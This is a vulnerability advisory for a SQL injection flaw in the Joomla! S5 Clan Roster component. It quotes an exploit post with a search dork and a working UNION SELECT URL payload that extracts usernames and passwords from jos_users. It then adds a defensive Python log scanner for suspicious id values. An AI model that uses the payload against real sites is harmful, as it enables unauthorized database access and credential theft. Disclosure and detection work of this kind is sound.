Release date:
Updated on: 2013-05-22
Affected Systems:
Joomla! S5 Clan Roster
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59993
The S5 Clan Roster component for Joomla! categorizes the members of a gaming clan.
The Joomla! S5 Clan Roster component (com_s5clanroster) has a SQL injection vulnerability in the id parameter of index.php. Successful exploitation of this vulnerability can lead to unauthorized database operations.
<* Source: AtT4CKxT3rR0r1ST
Link: http://www.exploit-db.com/exploits/25410/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Joomla Component com_s5clanroster SQL Injection Vulnerability
================================================================================
####################################################################
..:. Author: AtT4CKxT3rR0r1ST [F.Hack@w.cn]
..:. Dork: inurl:"com_s5clanroster"
.:. Script: http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
####################################################################
=== [Exploit] ===
SQL Injection:
====================
Server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[SQL]
Server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users ---
####################################################################
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
Currently, the vendor has not provided a patch or upgrade. We recommend that users of the software watch the vendor's homepage for the latest version:
http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
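
With no vendor patch available, requests that send a non-integer id to com_s5clanroster can be identified in web server access logs. The Python script below is an added example, not part of the original advisory or the vendor's code; it assumes common/combined log format and that a legitimate id is an integer (optionally in Joomla's id:alias form), and its sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_s5clanroster"
# Request field of a common/combined access-log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is an integer, optionally "id:alias".
VALID_ID_RE = re.compile(r"\d+(?::[A-Za-z0-9_-]+)?")

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/May/2013:10:00:01 +0000] "GET /index.php?option=com_s5clanroster'
    '&view=s5clanroster&layout=category&task=category&id=3 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [22/May/2013:10:02:14 +0000] "GET /index.php?option=com_s5clanroster'
    '&view=s5clanroster&layout=category&task=category&id=1%27 HTTP/1.1" 500 812',
    '198.51.100.23 - - [22/May/2013:10:02:20 +0000] "GET /index.php?option=com_s5clanroster'
    '&view=s5clanroster&layout=category&task=category'
    '&id=-null%27+%2F*%2150000UnIoN*%2F HTTP/1.1" 200 640',
    '203.0.113.7 - - [22/May/2013:10:03:00 +0000] "GET /index.php?option=com_content'
    '&id=abc HTTP/1.1" 404 300',
]

def suspicious_id(target):
    """Return the decoded id if the request targets the component with an
    id that is not a plain integer (or id:alias); otherwise return None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if COMPONENT not in query.get("option", []):
        return None  # other components are out of scope for this check
    for value in query.get("id", []):  # parse_qs has already URL-decoded it
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_id) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_id(match.group(1))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent a non-integer id to {COMPONENT}: {value!r}")
```

The same integer-only rule for id can be enforced in front of the site (for example in a reverse proxy or WAF rule) as a stopgap; parameters sent in a POST body do not appear in access logs and are not covered by this check.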